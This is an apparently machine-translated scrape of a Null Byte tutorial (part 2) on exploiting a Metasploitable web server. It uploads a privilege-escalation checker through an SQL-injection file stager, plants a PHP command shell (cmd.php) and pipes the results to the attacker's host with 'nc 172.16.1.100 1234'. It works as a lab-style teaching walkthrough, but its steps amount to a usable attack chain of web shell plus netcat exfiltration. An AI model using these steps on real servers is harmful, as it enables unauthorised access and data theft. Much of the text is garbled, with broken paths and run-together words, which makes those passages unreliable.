قالب وردپرس درنا توس
Home / Tips and Tricks / Web Server Compromise and Uploading Privilege Escalation Verification Files, Part 2 «Null Byte :: WonderHowTo

Web Server Compromise and Uploading Privilege Escalation Verification Files, Part 2 «Null Byte :: WonderHowTo



In the first guide, we've laid the groundwork for our ultimate goal of loading and running the unix-privesc-check script on our target. We have identified an input field that is vulnerable to SQL injection and used Sqlmap to set up a file stager on the server. Now we can upload files and run the script to identify any misconfigurations that could escalate privileges.

The unix-privesc-check script is a bash script that runs on Unix systems and attempts to identify misconfigurations that could allow privilege escalation. It can be executed either in standard mode (speed optimized) or in detail mode (even more). The default mode still looks for many things, including file permissions, user permissions, SSH keys, and other security settings. The detailed mode is more thorough but slower and may be prone to false alarms.

Step 1
: Upload the script

First, we need to find out where the script is located in our file system. You can search for this file with the command locate .

  locate unix-privesc-check 
  / usr / bin / unix-privesc-check
/ usr / share / unix-privesc-check
/usr/share/applications/kali-unix-privesc-check.desktop
/ usr / share / doc / unix-privesc-check
/ usr / share / doc / unix-privesc-check / AUTHORS
/usr/share/doc/unix-privesc-check/CHANGELOG.gz
/ usr / share / doc / unix-privesc-check / TODO
/usr/share/doc/unix-privesc-check/changelog.Debian.gz
/usr/share/doc/unix-privesc-check/changelog.gz
/ usr / share / doc / unix-privesc-check / copyright
/usr/share/icons/hicolor/16x16/apps/kali-unix-privesc-check.png
/usr/share/icons/hicolor/22x22/apps/kali-unix-privesc-check.png
/usr/share/icons/hicolor/24x24/apps/kali-unix-privesc-check.png
/usr/share/icons/hicolor/256x256/apps/kali-unix-privesc-check.png
/usr/share/icons/hicolor/32x32/apps/kali-unix-privesc-check.png
/usr/share/icons/hicolor/48x48/apps/kali-unix-privesc-check.png
/usr/share/kali-menu/applications/kali-unix-privesc-check.desktop
/ usr / share / unix-privesc-check / unix-privesc-check
/var/lib/dpkg/info/unix-privesc-check.list
/var/lib/dpkg/info/unix-privesc-check.md5sums[19659007AlsoasthatasoaseriesofresultsincludingdocumentationrelatedimagesandbinaryfilesbutthebuttablefileistheBashScriptDirectory / usr / share / unix-privesc-check / . 

Now that we have the location of the script, we can return to our file stager and search for it. After selecting, click the "Upload" button and we should see that the file has been successfully uploaded. If you do not know which button I'm talking about, be sure to read the first part of this guide, because you need to know what's going on in that part.

Since the script is now in the directory / var / www / on the server, we should look at it just by appending the name to the URL. so:

But wait. It seems that the only thing that happens is that the script itself appears in the browser window, which we do not want. For the script to execute, commands within that directory must be issued. Fortunately, we can do this with a simple PHP script.

Step 2: Upload the Shell

First, create a file named cmd.php and do it like this:

   

This one-liner uses an operating system command as the parameter and runs it on the underlying server. We will use this to execute our script.

Upload the command shell using the same method as before by navigating to the file stager and clicking the "Upload" button:

We can ensure that this works properly by appending the following to the URL:

  /cmd.php?cmd= 

For example, issuing the command uname -a returns operating system information.

Now that we know our command shell is working, it's time to start the Unix Privesc check script. On Unix systems, the dot slash (./) is used to execute executables in the current directory. This refers to the relative path to something and essentially allows the execution of files in directories that are not contained in the environment variable $ PATH.

  /cmd.php?cmd =. / Unix-privesc-check 

We can then tell what we do command shell to run the script with the above in the URL.

This does not actually return any results, it just gives us information about usage, they say we need to specify a mode. In most cases, the default mode will work fine, which we will use here. The command to enter should now read:

  /cmd.php?cmd = ./unix-privesc-check standard 

Now we can see that the results fill the browser window.

This script verifies a variety of things, and although we can see the results, it is not very useful when we connect lose or check our results later. It would be more helpful if we could send the results back to our own machine. One method we could use is the handy Netcat tool.

Step 3: Pipe Output to Local Machine

Netcat is a utility commonly used to troubleshoot connectivity issues in networks . It works over TCP / IP and can be found on many systems. Hackers often use Netcat as a backdoor or as a means to create shellfish. We can use this powerful tool to send the output of our script over the network and save it to a file on our local computer.

The first thing we need to do is open a listener on our computer. We can do this with the command nc and the switches -lvp stating to hear in a particular case literally on a selected port, 1234 . Then we use the redirect symbol (> ) to place in a file named results.txt .

  nc -lvp 1234> to write results.txt 
  listened to at [any]] 1234 ... 

Now you can run the script in the browser as before, but the pipe icon ( | ) to whistle over Netcat. The command to type looks like this, using the appropriate IP address and port:

  /cmd.php?cmd = ./unix-privesc-check standard | nc 172.16.1.100 1234 

After a few moments, a connection should be opened on our listening device:

  172.16.1.102: Inverse host search failed: Unknown host
Connecting to [172.16.1.100] by (UNKNOWN) [172.16.1.102] 43282 

Give the script some time to complete. It seems like it's hanging in both the browser and the terminal, but fills in the previously specified text file. We can now find cat the results:

  cat results.txt 
  Let's assume the operating system is: Linux
Starting unix-privesc-check v1.4 (http://pentestmonkey.net/tools/unix-privesc-check)

This script checks file permissions and other settings that are allowed
Local users to extend permissions.

Use of this script is permitted only on systems that have been granted to you
legal permission to carry out a safety assessment of. Apart from this
Condition applies the GPL v2.

Look for the word "WARNING" in the following issue. If you do not see it then
This script has not found any problems.

###########################################
Recording the host name
###########################################
metasploitable

###########################################
Record Uname
###########################################
Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux

###########################################
IP addresses of the recording interface
###########################################
eth0 Link encap: Ethernet HWaddr 08: 00: 27: 77: 62: 6c
inet adr: 172.16.1.102 Bcast: 172.31.255.255 Mask: 255.240.0.0
inet6 addr: fe80 :: a00: 27ff: fe77: 626c / 64 Scope: Link
UP-MULTICAST-MULTICAST-MTU: 1500 Metric: 1
RX Packets: 3462 Error: 0 Deleted: 0 Overflow: 0 Frame: 0
TX packets: 2757 Error: 0 Deleted: 0 Transgressions: 0 Carrier: 0
Collisions: 0 Txqueuelen: 1000
RX bytes: 446794 (436.3 KB) TX bytes: 974776 (951.9 KB)
Base address: 0xd010 Memory: f0000000-f0020000

lo Link encap: Local loopback
inet addr: 127.0.0.1 Mask: 255.0.0.0
inet6 addr: :: 1/128 Scope: Host
UPLOPBACK RUN MTU: 16436 Metric: 1
RX Packets: 487 Error: 0 Deleted: 0 Overflow: 0 Frame: 0
TX packets: 487 Error: 0 Cleared: 0 Overruns: 0 Carrier: 0
Collisions: 0 txqueuelen: 0
RX bytes: 214953 (209.9 KB) TX bytes: 214953 (209.9 KB)

###########################################
Check if external authentication is allowed in / etc / passwd
###########################################
No +: ... found a line in / etc / passwd

###########################################
Check nsswitch.conf for additional authentication methods
###########################################
Neither LDAP nor NIS are used for authentication

... 

There is a lot of information here and the results vary depending on the security of the destination. Basically, you should look for the word "warning" to find problems. For example, it looks like it has found a public SSH key in the root of the server:

  ######################### # #################
Search public SSH key directories
###########################################
WARNING: Public SSH key was found in /root/.ssh/authorized_keys[19659007NavingsavailableonourowncomputerwecanatanytimeresorttopossiblewaysofgrantingprivilegeescalationtonewattacksTarget:

Wrapping Up

In this tutorial, at the point where we stopped in Part 1, we looked and uploaded a script using sqlmap, to look for ways to increase permissions on the target. However, we had to do a few things to make it work properly, such as uploading a command shell to actually execute the script. We also learned how to use Netcat to transfer the output to a file on our local computer for later use. This attack scenario is just one of the many ways hackers have systems in the wild that show you can never be too creative with this craft.

Title image of TBIT / Pixabay; Screenshots of drd_ / zero byte

Source link